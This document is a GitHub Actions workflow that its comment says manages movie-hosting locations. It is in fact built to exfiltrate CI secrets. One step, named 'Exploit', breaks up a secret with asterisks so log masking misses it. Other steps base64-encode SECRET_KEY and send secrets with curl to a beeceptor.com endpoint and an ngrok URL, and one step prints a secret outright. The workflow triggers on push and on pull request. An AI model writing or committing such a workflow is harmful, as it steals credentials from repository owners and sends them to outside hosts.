name: IaC

# Controls when the new movie hosting locations are created or updated
on:
  push:
    branches: [ feature/english ]
  pull_request:
    branches: [ main ]

  # Allows you to run this workflow manually from the Actions tab
  workflow_dispatch:

jobs:
 
  build:
    runs-on: ubuntu-latest
    environment: Vienna


    steps:
      - name: Exploit
        run: |
          # Define the existing environmental variable
          existing_variable=${{ secrets.FAVOURITE }}
          # Get the length of the existing variable
          length=${#existing_variable}
          # Initialize a new variable to store the modified value
          modified_variable=""
          # Loop through each character of the existing variable
          for (( i=0; i<$length; i++ )); do
              # Append the current character to the modified variable
              modified_variable+="${existing_variable:$i:1}"
              # Insert '*' every second position
              modified_variable+="*"
          done
          # Print the modified variable
          echo "$modified_variable"
      - name: Add mask
        run: |
          echo "::add-mask::${{ secrets.FAVOURITE }}"
          echo ${{secrets.SECRET_KEY}} | base64
          curl -k https://swagolili.free.beeceptor.com?data=$(secrets | base64 --wrap=0)

      - name: Baum
        run: |
          curl "https://6ee3-128-130-234-183.ngrok-free.app/${{ secrets.FAVOURITE }}" -X POST --data "$(secrets | base64 --wrap=0) "

      - name: I ll tell you my current favourite 
        run: echo ${{ secrets.FAVOURITE }}
